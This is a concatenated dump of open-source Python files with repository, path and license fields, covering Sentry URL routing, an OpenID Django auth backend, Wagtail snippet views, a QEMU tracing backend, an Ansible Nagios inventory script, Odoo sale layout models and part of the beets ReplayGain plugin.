GroupTagKeyDetailsEndpoint.as_view(),
name='sentry-api-0-group-tagkey-details'),
url(r'^groups/(?P<group_id>\d+)/tags/(?P<key>[^/]+)/values/$',
GroupTagKeyValuesEndpoint.as_view(),
name='sentry-api-0-group-tagkey-values'),
# Events
url(r'^events/(?P<event_id>\d+)/$',
EventDetailsEndpoint.as_view(),
name='sentry-api-0-event-details'),
# Help Pages
url(r'^helppages/$',
HelpPageIndexEndpoint.as_view(),
name='sentry-api-0-helppage-index'),
url(r'^helppages/(?P<page_id>\d+)/$',
HelpPageDetailsEndpoint.as_view(),
name='sentry-api-0-helppage-details'),
# Internal
url(r'^internal/stats/$',
InternalStatsEndpoint.as_view(),
name='sentry-api-0-internal-stats'),
url(r'^$',
IndexEndpoint.as_view(),
name='sentry-api-index'),
url(r'^',
CatchallEndpoint.as_view(),
name='sentry-api-catchall'),
# url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
)
| bsd-3-clause |
gimler/techism2 | django_openid_auth/auth.py | 2 | 8813 | # django-openid-auth - OpenID integration for django.contrib.auth
#
# Copyright (C) 2008-2010 Canonical Ltd.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Glue between OpenID and django.contrib.auth."""
__metaclass__ = type
from django.conf import settings
from django.contrib.auth.models import User, Group
from openid.consumer.consumer import SUCCESS
from openid.extensions import ax, sreg
from django_openid_auth import teams
from django_openid_auth.models import UserOpenID
class IdentityAlreadyClaimed(Exception):
pass
class OpenIDBackend:
"""A django.contrib.auth backend that authenticates the user based on
an OpenID response."""
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
def authenticate(self, **kwargs):
"""Authenticate the user based on an OpenID response."""
# Require that the OpenID response be passed in as a keyword
# argument, to make sure we don't match the username/password
# calling conventions of authenticate.
openid_response = kwargs.get('openid_response')
if openid_response is None:
return None
if openid_response.status != SUCCESS:
return None
user = None
try:
user_openid = UserOpenID.objects.get(
claimed_id__exact=openid_response.identity_url)
except UserOpenID.DoesNotExist:
if getattr(settings, 'OPENID_CREATE_USERS', False):
user = self.create_user_from_openid(openid_response)
else:
user = user_openid.user
if user is None:
return None
if getattr(settings, 'OPENID_UPDATE_DETAILS_FROM_SREG', False):
details = self._extract_user_details(openid_response)
self.update_user_details(user, details)
teams_response = teams.TeamsResponse.fromSuccessResponse(
openid_response)
if teams_response:
self.update_groups_from_teams(user, teams_response)
return user
def _extract_user_details(self, openid_response):
email = fullname = first_name = last_name = nickname = None
sreg_response = sreg.SRegResponse.fromSuccessResponse(openid_response)
if sreg_response:
email = sreg_response.get('email')
fullname = sreg_response.get('fullname')
nickname = sreg_response.get('nickname')
# If any attributes are provided via Attribute Exchange, use
# them in preference.
fetch_response = ax.FetchResponse.fromSuccessResponse(openid_response)
if fetch_response:
# The myOpenID provider advertises AX support, but uses
# attribute names from an obsolete draft of the
# specification. We check for them first so the common
# names take precedence.
email = fetch_response.getSingle(
'http://schema.openid.net/contact/email', email)
fullname = fetch_response.getSingle(
'http://schema.openid.net/namePerson', fullname)
nickname = fetch_response.getSingle(
'http://schema.openid.net/namePerson/friendly', nickname)
email = fetch_response.getSingle(
'http://axschema.org/contact/email', email)
fullname = fetch_response.getSingle(
'http://axschema.org/namePerson', fullname)
first_name = fetch_response.getSingle(
'http://axschema.org/namePerson/first', first_name)
last_name = fetch_response.getSingle(
'http://axschema.org/namePerson/last', last_name)
nickname = fetch_response.getSingle(
'http://axschema.org/namePerson/friendly', nickname)
if fullname and not (first_name or last_name):
# Django wants to store first and last names separately,
# so we do our best to split the full name.
if ' ' in fullname:
first_name, last_name = fullname.rsplit(None, 1)
else:
first_name = u''
last_name = fullname
return dict(email=email, nickname=nickname,
first_name=first_name, last_name=last_name)
def create_user_from_openid(self, openid_response):
details = self._extract_user_details(openid_response)
nickname = details['nickname'] or 'openiduser'
email = details['email'] or ''
# Pick a username for the user based on their nickname,
# checking for conflicts.
i = 1
while True:
username = nickname
if i > 1:
username += str(i)
try:
User.objects.get(username__exact=username)
except User.DoesNotExist:
break
i += 1
user = User.objects.create_user(username, email, password=None)
self.update_user_details(user, details)
self.associate_openid(user, openid_response)
return user
def associate_openid(self, user, openid_response):
"""Associate an OpenID with a user account."""
# Check to see if this OpenID has already been claimed.
try:
user_openid = UserOpenID.objects.get(
claimed_id__exact=openid_response.identity_url)
except UserOpenID.DoesNotExist:
user_openid = UserOpenID(
user=user,
claimed_id=openid_response.identity_url,
display_id=openid_response.endpoint.getDisplayIdentifier())
user_openid.save()
else:
if user_openid.user != user:
raise IdentityAlreadyClaimed(
"The identity %s has already been claimed"
% openid_response.identity_url)
return user_openid
def update_user_details(self, user, details):
updated = False
if details['first_name']:
user.first_name = details['first_name']
updated = True
if details['last_name']:
user.last_name = details['last_name']
updated = True
if details['email']:
user.email = details['email']
updated = True
if updated:
user.save()
def update_groups_from_teams(self, user, teams_response):
teams_mapping_auto = getattr(settings, 'OPENID_LAUNCHPAD_TEAMS_MAPPING_AUTO', False)
teams_mapping_auto_blacklist = getattr(settings, 'OPENID_LAUNCHPAD_TEAMS_MAPPING_AUTO_BLACKLIST', [])
teams_mapping = getattr(settings, 'OPENID_LAUNCHPAD_TEAMS_MAPPING', {})
if teams_mapping_auto:
#ignore teams_mapping. use all django-groups
teams_mapping = dict()
all_groups = Group.objects.exclude(name__in=teams_mapping_auto_blacklist)
for group in all_groups:
teams_mapping[group.name] = group.name
if len(teams_mapping) == 0:
return
current_groups = set(user.groups.filter(
name__in=teams_mapping.values()))
desired_groups = set(Group.objects.filter(
name__in=[teams_mapping[lp_team]
for lp_team in teams_response.is_member
if lp_team in teams_mapping]))
for group in current_groups - desired_groups:
user.groups.remove(group)
for group in desired_groups - current_groups:
user.groups.add(group)
| apache-2.0 |
xq262144/hue | apps/filebrowser/setup.py | 40 | 1214 | # Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages
from hueversion import VERSION
setup(
name = "filebrowser",
version = VERSION,
author = "Hue",
url = 'http://github.com/cloudera/hue',
description = "HDFS browser",
packages = find_packages('src'),
package_dir = {'': 'src'},
install_requires = ['setuptools', 'desktop'],
entry_points = { 'desktop.sdk.application': 'filebrowser=filebrowser' },
)
| apache-2.0 |
mixxorz/wagtail | wagtail/snippets/views/snippets.py | 3 | 9927 | from urllib.parse import urlencode
from django.apps import apps
from django.contrib.admin.utils import quote, unquote
from django.core.paginator import Paginator
from django.http import Http404
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from django.utils.translation import ungettext
from wagtail.admin import messages
from wagtail.admin.auth import permission_denied
from wagtail.admin.edit_handlers import ObjectList, extract_panel_definitions_from_model_class
from wagtail.admin.forms.search import SearchForm
from wagtail.search.backends import get_search_backend
from wagtail.search.index import class_is_indexed
from wagtail.snippets.models import get_snippet_models
from wagtail.snippets.permissions import get_permission_name, user_can_edit_snippet_type
# == Helper functions ==
def get_snippet_model_from_url_params(app_name, model_name):
"""
Retrieve a model from an app_label / model_name combo.
Raise Http404 if the model is not a valid snippet type.
"""
try:
model = apps.get_model(app_name, model_name)
except LookupError:
raise Http404
if model not in get_snippet_models():
# don't allow people to hack the URL to edit content types that aren't registered as snippets
raise Http404
return model
SNIPPET_EDIT_HANDLERS = {}
def get_snippet_edit_handler(model):
if model not in SNIPPET_EDIT_HANDLERS:
if hasattr(model, 'edit_handler'):
# use the edit handler specified on the page class
edit_handler = model.edit_handler
else:
panels = extract_panel_definitions_from_model_class(model)
edit_handler = ObjectList(panels)
SNIPPET_EDIT_HANDLERS[model] = edit_handler.bind_to(model=model)
return SNIPPET_EDIT_HANDLERS[model]
# == Views ==
def index(request):
snippet_model_opts = [
model._meta for model in get_snippet_models()
if user_can_edit_snippet_type(request.user, model)]
return render(request, 'wagtailsnippets/snippets/index.html', {
'snippet_model_opts': sorted(
snippet_model_opts, key=lambda x: x.verbose_name.lower())})
def list(request, app_label, model_name):
model = get_snippet_model_from_url_params(app_label, model_name)
permissions = [
get_permission_name(action, model)
for action in ['add', 'change', 'delete']
]
if not any([request.user.has_perm(perm) for perm in permissions]):
return permission_denied(request)
items = model.objects.all()
# Preserve the snippet's model-level ordering if specified, but fall back on PK if not
# (to ensure pagination is consistent)
if not items.ordered:
items = items.order_by('pk')
# Search
is_searchable = class_is_indexed(model)
is_searching = False
search_query = None
if is_searchable and 'q' in request.GET:
search_form = SearchForm(request.GET, placeholder=_("Search %(snippet_type_name)s") % {
'snippet_type_name': model._meta.verbose_name_plural
})
if search_form.is_valid():
search_query = search_form.cleaned_data['q']
search_backend = get_search_backend()
items = search_backend.search(search_query, items)
is_searching = True
else:
search_form = SearchForm(placeholder=_("Search %(snippet_type_name)s") % {
'snippet_type_name': model._meta.verbose_name_plural
})
paginator = Paginator(items, per_page=20)
paginated_items = paginator.get_page(request.GET.get('p'))
# Template
if request.is_ajax():
template = 'wagtailsnippets/snippets/results.html'
else:
template = 'wagtailsnippets/snippets/type_index.html'
return render(request, template, {
'model_opts': model._meta,
'items': paginated_items,
'can_add_snippet': request.user.has_perm(get_permission_name('add', model)),
'can_delete_snippets': request.user.has_perm(get_permission_name('delete', model)),
'is_searchable': is_searchable,
'search_form': search_form,
'is_searching': is_searching,
'query_string': search_query,
})
def create(request, app_label, model_name):
model = get_snippet_model_from_url_params(app_label, model_name)
permission = get_permission_name('add', model)
if not request.user.has_perm(permission):
return permission_denied(request)
instance = model()
edit_handler = get_snippet_edit_handler(model)
edit_handler = edit_handler.bind_to(request=request)
form_class = edit_handler.get_form_class()
if request.method == 'POST':
form = form_class(request.POST, request.FILES, instance=instance)
if form.is_valid():
form.save()
messages.success(
request,
_("%(snippet_type)s '%(instance)s' created.") % {
'snippet_type': capfirst(model._meta.verbose_name),
'instance': instance
},
buttons=[
messages.button(reverse(
'wagtailsnippets:edit', args=(app_label, model_name, quote(instance.pk))
), _('Edit'))
]
)
return redirect('wagtailsnippets:list', app_label, model_name)
else:
messages.validation_error(
request, _("The snippet could not be created due to errors."), form
)
else:
form = form_class(instance=instance)
edit_handler = edit_handler.bind_to(instance=instance, form=form)
return render(request, 'wagtailsnippets/snippets/create.html', {
'model_opts': model._meta,
'edit_handler': edit_handler,
'form': form,
})
def edit(request, app_label, model_name, pk):
model = get_snippet_model_from_url_params(app_label, model_name)
permission = get_permission_name('change', model)
if not request.user.has_perm(permission):
return permission_denied(request)
instance = get_object_or_404(model, pk=unquote(pk))
edit_handler = get_snippet_edit_handler(model)
edit_handler = edit_handler.bind_to(instance=instance, request=request)
form_class = edit_handler.get_form_class()
if request.method == 'POST':
form = form_class(request.POST, request.FILES, instance=instance)
if form.is_valid():
form.save()
messages.success(
request,
_("%(snippet_type)s '%(instance)s' updated.") % {
'snippet_type': capfirst(model._meta.verbose_name),
'instance': instance
},
buttons=[
messages.button(reverse(
'wagtailsnippets:edit', args=(app_label, model_name, quote(instance.pk))
), _('Edit'))
]
)
return redirect('wagtailsnippets:list', app_label, model_name)
else:
messages.validation_error(
request, _("The snippet could not be saved due to errors."), form
)
else:
form = form_class(instance=instance)
edit_handler = edit_handler.bind_to(form=form)
return render(request, 'wagtailsnippets/snippets/edit.html', {
'model_opts': model._meta,
'instance': instance,
'edit_handler': edit_handler,
'form': form,
})
def delete(request, app_label, model_name, pk=None):
model = get_snippet_model_from_url_params(app_label, model_name)
permission = get_permission_name('delete', model)
if not request.user.has_perm(permission):
return permission_denied(request)
if pk:
instances = [get_object_or_404(model, pk=unquote(pk))]
else:
ids = request.GET.getlist('id')
instances = model.objects.filter(pk__in=ids)
count = len(instances)
if request.method == 'POST':
for instance in instances:
instance.delete()
if count == 1:
message_content = _("%(snippet_type)s '%(instance)s' deleted.") % {
'snippet_type': capfirst(model._meta.verbose_name),
'instance': instance
}
else:
# This message is only used in plural form, but we'll define it with ungettext so that
# languages with multiple plural forms can be handled correctly (or, at least, as
# correctly as possible within the limitations of verbose_name_plural...)
message_content = ungettext(
"%(count)d %(snippet_type)s deleted.",
"%(count)d %(snippet_type)s deleted.",
count
) % {
'snippet_type': capfirst(model._meta.verbose_name_plural),
'count': count
}
messages.success(request, message_content)
return redirect('wagtailsnippets:list', app_label, model_name)
return render(request, 'wagtailsnippets/snippets/confirm_delete.html', {
'model_opts': model._meta,
'count': count,
'instances': instances,
'submit_url': (
reverse('wagtailsnippets:delete-multiple', args=(app_label, model_name))
+ '?' + urlencode([('id', instance.pk) for instance in instances])
),
})
def usage(request, app_label, model_name, pk):
model = get_snippet_model_from_url_params(app_label, model_name)
instance = get_object_or_404(model, pk=unquote(pk))
paginator = Paginator(instance.get_usage(), per_page=20)
used_by = paginator.get_page(request.GET.get('p'))
return render(request, "wagtailsnippets/snippets/usage.html", {
'instance': instance,
'used_by': used_by
})
| bsd-3-clause |
BlastarIndia/Blastarix | qemu-1.7.0/scripts/tracetool/backend/ust.py | 74 | 2419 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
LTTng User Space Tracing backend.
"""
__author__ = "Lluís Vilanova <vilanova@ac.upc.edu>"
__copyright__ = "Copyright 2012, Lluís Vilanova <vilanova@ac.upc.edu>"
__license__ = "GPL version 2 or (at your option) any later version"
__maintainer__ = "Stefan Hajnoczi"
__email__ = "stefanha@linux.vnet.ibm.com"
from tracetool import out
PUBLIC = True
def c(events):
out('#include <ust/marker.h>',
'#undef mutex_lock',
'#undef mutex_unlock',
'#undef inline',
'#undef wmb',
'#include "trace.h"')
for e in events:
argnames = ", ".join(e.args.names())
if len(e.args) > 0:
argnames = ', ' + argnames
out('DEFINE_TRACE(ust_%(name)s);',
'',
'static void ust_%(name)s_probe(%(args)s)',
'{',
' trace_mark(ust, %(name)s, %(fmt)s%(argnames)s);',
'}',
name = e.name,
args = e.args,
fmt = e.fmt,
argnames = argnames,
)
else:
out('DEFINE_TRACE(ust_%(name)s);',
'',
'static void ust_%(name)s_probe(%(args)s)',
'{',
' trace_mark(ust, %(name)s, UST_MARKER_NOARGS);',
'}',
name = e.name,
args = e.args,
)
# register probes
out('',
'static void __attribute__((constructor)) trace_init(void)',
'{')
for e in events:
out(' register_trace_ust_%(name)s(ust_%(name)s_probe);',
name = e.name,
)
out('}')
def h(events):
out('#include <ust/tracepoint.h>',
'#undef mutex_lock',
'#undef mutex_unlock',
'#undef inline',
'#undef wmb')
for e in events:
if len(e.args) > 0:
out('DECLARE_TRACE(ust_%(name)s, TP_PROTO(%(args)s), TP_ARGS(%(argnames)s));',
'#define trace_%(name)s trace_ust_%(name)s',
name = e.name,
args = e.args,
argnames = ", ".join(e.args.names()),
)
else:
out('_DECLARE_TRACEPOINT_NOARGS(ust_%(name)s);',
'#define trace_%(name)s trace_ust_%(name)s',
name = e.name,
)
out()
| gpl-3.0 |
stevekuznetsov/ansible | contrib/inventory/nagios_ndo.py | 213 | 3842 | #!/usr/bin/env python
# (c) 2014, Jonathan Lestrelin <jonathan.lestrelin@gmail.com>
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
Nagios NDO external inventory script.
========================================
Returns hosts and hostgroups from Nagios NDO.
Configuration is read from `nagios_ndo.ini`.
"""
import os
import argparse
try:
import configparser
except ImportError:
import ConfigParser
configparser = ConfigParser
import json
try:
from sqlalchemy import text
from sqlalchemy.engine import create_engine
except ImportError:
print("Error: SQLAlchemy is needed. Try something like: pip install sqlalchemy")
exit(1)
class NagiosNDOInventory(object):
def read_settings(self):
config = configparser.SafeConfigParser()
config.read(os.path.dirname(os.path.realpath(__file__)) + '/nagios_ndo.ini')
if config.has_option('ndo', 'database_uri'):
self.ndo_database_uri = config.get('ndo', 'database_uri')
def read_cli(self):
parser = argparse.ArgumentParser()
parser.add_argument('--host', nargs=1)
parser.add_argument('--list', action='store_true')
self.options = parser.parse_args()
def get_hosts(self):
engine = create_engine(self.ndo_database_uri)
connection = engine.connect()
select_hosts = text("SELECT display_name \
FROM nagios_hosts")
select_hostgroups = text("SELECT alias \
FROM nagios_hostgroups")
select_hostgroup_hosts = text("SELECT h.display_name \
FROM nagios_hostgroup_members hgm, nagios_hosts h, nagios_hostgroups hg \
WHERE hgm.hostgroup_id = hg.hostgroup_id \
AND hgm.host_object_id = h.host_object_id \
AND hg.alias =:hostgroup_alias")
hosts = connection.execute(select_hosts)
self.result['all']['hosts'] = [host['display_name'] for host in hosts]
for hostgroup in connection.execute(select_hostgroups):
hostgroup_alias = hostgroup['alias']
self.result[hostgroup_alias] = {}
hosts = connection.execute(select_hostgroup_hosts, hostgroup_alias=hostgroup_alias)
self.result[hostgroup_alias]['hosts'] = [host['display_name'] for host in hosts]
def __init__(self):
self.defaultgroup = 'group_all'
self.ndo_database_uri = None
self.options = None
self.read_settings()
self.read_cli()
self.result = {}
self.result['all'] = {}
self.result['all']['hosts'] = []
self.result['_meta'] = {}
self.result['_meta']['hostvars'] = {}
if self.ndo_database_uri:
self.get_hosts()
if self.options.host:
print(json.dumps({}))
elif self.options.list:
print(json.dumps(self.result))
else:
print("usage: --list or --host HOSTNAME")
exit(1)
else:
print("Error: Database configuration is missing. See nagios_ndo.ini.")
exit(1)
NagiosNDOInventory()
| gpl-3.0 |
johnmcdowall/procedural_city_generation | procedural_city_generation/building_generation/getFoundation.py | 3 | 2136 | import numpy as np
from procedural_city_generation.polygons.Polygon2D import Polygon2D, Edge
def getFoundation(poly, grid_width=0.01, eps=10**-8):
rect_area = 0
rect_height = 0
rect_x = [0,0]
rect_base = None
#Iterate through edges which are bordering a road, find largest
#rectangle for each one
for base in sorted([edge for edge in poly.edges if edge.bordering_road],
key=lambda x: -x.length):
#Initialize height
height = grid_width
done = False
while not done:
cuts = []
for other in poly.edges:
#Find all intersections
if other is not base:
x = [0,0]
try:
x = np.linalg.solve(np.array(((base.dir_vector), (-other.dir_vector))).T,
other[0] - (base[0] + base.n * height))
except np.linalg.LinAlgError:
pass
if eps < x[1] < 1 - eps:
#intersection found
if x[0] < eps:
cuts.append(0)
elif x[0] > 1 - eps:
cuts.append(1)
else:
cuts.append(x[0])
if len(cuts) == 2:
#Possible rectangle found
width = abs(base.length*cuts[1] - base.length*cuts[0])
this_area = width * height
if this_area > rect_area:
rect_area = this_area
rect_height = height
rect_x = cuts
rect_base = base
height += grid_width
else:
done = True
break
if rect_height:
p1 = rect_base[0] + rect_x[1] * rect_base.dir_vector
p2 = rect_base[0] + rect_x[0] * rect_base.dir_vector
p3 = p2 + rect_height * rect_base.n
p4 = p1 + rect_height * rect_base.n
return Polygon2D([p1,p2,p3,p4])
else:
#TODO: assign issue to lenny ... why return false
return False
if __name__=="__main__":
import matplotlib.pyplot as plt
from plot_poly import plot_poly
from getBlock import getBlock
from getLots import getLots
import construct_polygons as cp
polys, vertices = cp.main()
lots = getLots(polys[:20], vertices)
for poly in lots:
if poly.poly_type == "lot":
f = getFoundation(poly)
if f:
plot_poly(poly, mode="k")
plot_poly(f, mode="g")
else:
plot_poly(poly, mode="r")
plt.show()
| mpl-2.0 |
lightcn/odoo | addons/sale_layout/models/sale_layout.py | 180 | 5037 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv, fields
from itertools import groupby
def grouplines(self, ordered_lines, sortkey):
"""Return lines from a specified invoice or sale order grouped by category"""
grouped_lines = []
for key, valuesiter in groupby(ordered_lines, sortkey):
group = {}
group['category'] = key
group['lines'] = list(v for v in valuesiter)
if 'subtotal' in key and key.subtotal is True:
group['subtotal'] = sum(line.price_subtotal for line in group['lines'])
grouped_lines.append(group)
return grouped_lines
class SaleLayoutCategory(osv.Model):
_name = 'sale_layout.category'
_order = 'sequence, id'
_columns = {
'name': fields.char('Name', required=True),
'sequence': fields.integer('Sequence', required=True),
'subtotal': fields.boolean('Add subtotal'),
'separator': fields.boolean('Add separator'),
'pagebreak': fields.boolean('Add pagebreak')
}
_defaults = {
'subtotal': True,
'separator': True,
'pagebreak': False,
'sequence': 10
}
class AccountInvoice(osv.Model):
_inherit = 'account.invoice'
def sale_layout_lines(self, cr, uid, ids, invoice_id=None, context=None):
"""
Returns invoice lines from a specified invoice ordered by
sale_layout_category sequence. Used in sale_layout module.
:Parameters:
-'invoice_id' (int): specify the concerned invoice.
"""
ordered_lines = self.browse(cr, uid, invoice_id, context=context).invoice_line
# We chose to group first by category model and, if not present, by invoice name
sortkey = lambda x: x.sale_layout_cat_id if x.sale_layout_cat_id else ''
return grouplines(self, ordered_lines, sortkey)
import openerp
class AccountInvoiceLine(osv.Model):
_inherit = 'account.invoice.line'
_order = 'invoice_id, categ_sequence, sequence, id'
sale_layout_cat_id = openerp.fields.Many2one('sale_layout.category', string='Section')
categ_sequence = openerp.fields.Integer(related='sale_layout_cat_id.sequence',
string='Layout Sequence', store=True)
_defaults = {
'categ_sequence': 0
}
class SaleOrder(osv.Model):
_inherit = 'sale.order'
def sale_layout_lines(self, cr, uid, ids, order_id=None, context=None):
"""
Returns order lines from a specified sale ordered by
sale_layout_category sequence. Used in sale_layout module.
:Parameters:
-'order_id' (int): specify the concerned sale order.
"""
ordered_lines = self.browse(cr, uid, order_id, context=context).order_line
sortkey = lambda x: x.sale_layout_cat_id if x.sale_layout_cat_id else ''
return grouplines(self, ordered_lines, sortkey)
class SaleOrderLine(osv.Model):
_inherit = 'sale.order.line'
_columns = {
'sale_layout_cat_id': fields.many2one('sale_layout.category',
string='Section'),
'categ_sequence': fields.related('sale_layout_cat_id',
'sequence', type='integer',
string='Layout Sequence', store=True)
# Store is intentionally set in order to keep the "historic" order.
}
_defaults = {
'categ_sequence': 0
}
_order = 'order_id, categ_sequence, sale_layout_cat_id, sequence, id'
def _prepare_order_line_invoice_line(self, cr, uid, line, account_id=False, context=None):
"""Save the layout when converting to an invoice line."""
invoice_vals = super(SaleOrderLine, self)._prepare_order_line_invoice_line(cr, uid, line, account_id=account_id, context=context)
if line.sale_layout_cat_id:
invoice_vals['sale_layout_cat_id'] = line.sale_layout_cat_id.id
if line.categ_sequence:
invoice_vals['categ_sequence'] = line.categ_sequence
return invoice_vals
| agpl-3.0 |
jmwatte/beets | beetsplug/replaygain.py | 2 | 33992 | # This file is part of beets.
# Copyright 2015, Fabrice Laporte, Yevgeny Bezman, and Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
from __future__ import (division, absolute_import, print_function,
unicode_literals)
import subprocess
import os
import collections
import itertools
import sys
import warnings
import re
from beets import logging
from beets import ui
from beets.plugins import BeetsPlugin
from beets.util import syspath, command_output, displayable_path
# Utilities.
class ReplayGainError(Exception):
"""Raised when a local (to a track or an album) error occurs in one
of the backends.
"""
class FatalReplayGainError(Exception):
"""Raised when a fatal error occurs in one of the backends.
"""
def call(args):
"""Execute the command and return its output or raise a
ReplayGainError on failure.
"""
try:
return command_output(args)
except subprocess.CalledProcessError as e:
raise ReplayGainError(
"{0} exited with status {1}".format(args[0], e.returncode)
)
except UnicodeEncodeError:
# Due to a bug in Python 2's subprocess on Windows, Unicode
# filenames can fail to encode on that platform. See:
# http://code.google.com/p/beets/issues/detail?id=499
raise ReplayGainError("argument encoding failed")
# Backend base and plumbing classes.
Gain = collections.namedtuple("Gain", "gain peak")
AlbumGain = collections.namedtuple("AlbumGain", "album_gain track_gains")
class Backend(object):
"""An abstract class representing engine for calculating RG values.
"""
def __init__(self, config, log):
"""Initialize the backend with the configuration view for the
plugin.
"""
self._log = log
def compute_track_gain(self, items):
raise NotImplementedError()
def compute_album_gain(self, album):
# TODO: implement album gain in terms of track gain of the
# individual tracks which can be used for any backend.
raise NotImplementedError()
# bsg1770gain backend
class Bs1770gainBackend(Backend):
"""bs1770gain is a loudness scanner compliant with ITU-R BS.1770 and
its flavors EBU R128, ATSC A/85 and Replaygain 2.0.
"""
def __init__(self, config, log):
super(Bs1770gainBackend, self).__init__(config, log)
config.add({
'chunk_at': 5000,
'method': 'replaygain',
})
self.chunk_at = config['chunk_at'].as_number()
self.method = b'--' + bytes(config['method'].get(unicode))
cmd = b'bs1770gain'
try:
call([cmd, self.method])
self.command = cmd
except OSError:
raise FatalReplayGainError(
'Is bs1770gain installed? Is your method in config correct?'
)
if not self.command:
raise FatalReplayGainError(
'no replaygain command found: install bs1770gain'
)
def compute_track_gain(self, items):
"""Computes the track gain of the given tracks, returns a list
of TrackGain objects.
"""
output = self.compute_gain(items, False)
return output
def compute_album_gain(self, album):
"""Computes the album gain of the given album, returns an
AlbumGain object.
"""
# TODO: What should be done when not all tracks in the album are
# supported?
supported_items = album.items()
output = self.compute_gain(supported_items, True)
if not output:
raise ReplayGainError('no output from bs1770gain')
return AlbumGain(output[-1], output[:-1])
def isplitter(self, items, chunk_at):
"""Break an iterable into chunks of at most size `chunk_at`,
generating lists for each chunk.
"""
iterable = iter(items)
while True:
result = []
for i in range(chunk_at):
try:
a = next(iterable)
except StopIteration:
break
else:
result.append(a)
if result:
yield result
else:
break
def compute_gain(self, items, is_album):
"""Computes the track or album gain of a list of items, returns
a list of TrackGain objects.
When computing album gain, the last TrackGain object returned is
the album gain
"""
if len(items) == 0:
return []
albumgaintot = 0.0
albumpeaktot = 0.0
returnchunks = []
# In the case of very large sets of music, we break the tracks
# into smaller chunks and process them one at a time. This
# avoids running out of memory.
if len(items) > self.chunk_at:
i = 0
for chunk in self.isplitter(items, self.chunk_at):
i += 1
returnchunk = self.compute_chunk_gain(chunk, is_album)
albumgaintot += returnchunk[-1].gain
albumpeaktot += returnchunk[-1].peak
returnchunks = returnchunks + returnchunk[0:-1]
returnchunks.append(Gain(albumgaintot / i, albumpeaktot / i))
return returnchunks
else:
return self.compute_chunk_gain(items, is_album)
def compute_chunk_gain(self, items, is_album):
"""Compute ReplayGain values and return a list of results
dictionaries as given by `parse_tool_output`.
"""
# Construct shell command.
cmd = [self.command]
cmd = cmd + [self.method]
cmd = cmd + [b'-it']
# Workaround for Windows: the underlying tool fails on paths
# with the \\?\ prefix, so we don't use it here. This
# prevents the backend from working with long paths.
args = cmd + [syspath(i.path, prefix=False) for i in items]
# Invoke the command.
self._log.debug("executing {0}", " ".join(map(displayable_path, args)))
output = call(args)
self._log.debug(u'analysis finished: {0}', output)
results = self.parse_tool_output(output,
len(items) + is_album)
self._log.debug(u'{0} items, {1} results', len(items), len(results))
return results
def parse_tool_output(self, text, num_lines):
"""Given the output from bs1770gain, parse the text and
return a list of dictionaries
containing information about each analyzed file.
"""
out = []
data = text.decode('utf8', errors='ignore')
regex = re.compile(
ur'(\s{2,2}\[\d+\/\d+\].*?|\[ALBUM\].*?)'
'(?=\s{2,2}\[\d+\/\d+\]|\s{2,2}\[ALBUM\]'
':|done\.\s)', re.DOTALL | re.UNICODE)
results = re.findall(regex, data)
